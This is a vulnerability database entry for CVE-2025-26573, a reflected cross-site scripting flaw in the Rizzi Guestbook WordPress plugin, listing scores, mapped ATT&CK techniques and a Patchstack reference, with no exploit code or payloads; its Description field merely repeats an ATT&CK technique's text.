CVE-2025-26573

High

Published: 26 March 2025

Published

26 March 2025

Modified

23 April 2026

KEV Added

—

Patch

—

CVSS Score 7.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS Score 0.0026 49.7th percentile

Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Description

Adversaries can use stolen session cookies to authenticate to web applications and services.

Security Summary

CVE-2025-26573 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-site Scripting (XSS) under CWE-79, affecting the Rizzi Guestbook plugin (rizzi-guestbook) from JamRizzi Technologies. This WordPress plugin is vulnerable in all versions from n/a through 4.0.1 inclusive. The issue was published on 2025-03-26 with a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).

Attackers can exploit this remotely over the network with low complexity and no required privileges, but it necessitates user interaction, such as clicking a malicious link. Upon successful exploitation, arbitrary JavaScript executes in the context of the targeted user's browser due to the changed scope (S:C), potentially enabling limited impacts on confidentiality, integrity, and availability, such as stealing session cookies or performing actions on behalf of the victim.

The primary advisory reference is from Patchstack, detailing the XSS vulnerability in the WordPress Rizzi Guestbook plugin up to version 4.0.1. Security practitioners should review this source for specific mitigation recommendations, including any available patches or workarounds.

Details

CWE(s): CWE-79

MITRE ATT&CK Enterprise Techniques

T1059.007 JavaScript Execution

Adversaries may abuse various implementations of JavaScript for execution.

attack.mitre.org →

T1185 Browser Session Hijacking Collection

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

T1550.004 Web Session Cookie Lateral Movement

Adversaries can use stolen session cookies to authenticate to web applications and services.

attack.mitre.org →

Why these techniques?

Reflected XSS allows arbitrary JavaScript execution in victim's browser, directly enabling T1059.007 (JavaScript), T1185 (Browser Session Hijacking), T1539 (Steal Web Session Cookie), and T1550.004 (Web Session Cookie) as described in the CVE impacts.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References

https://patchstack.com/database/Wordpress/Plugin/rizzi-guestbook/vulnerability/wordpress-rizzi-guestbook-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve
audit@patchstack.com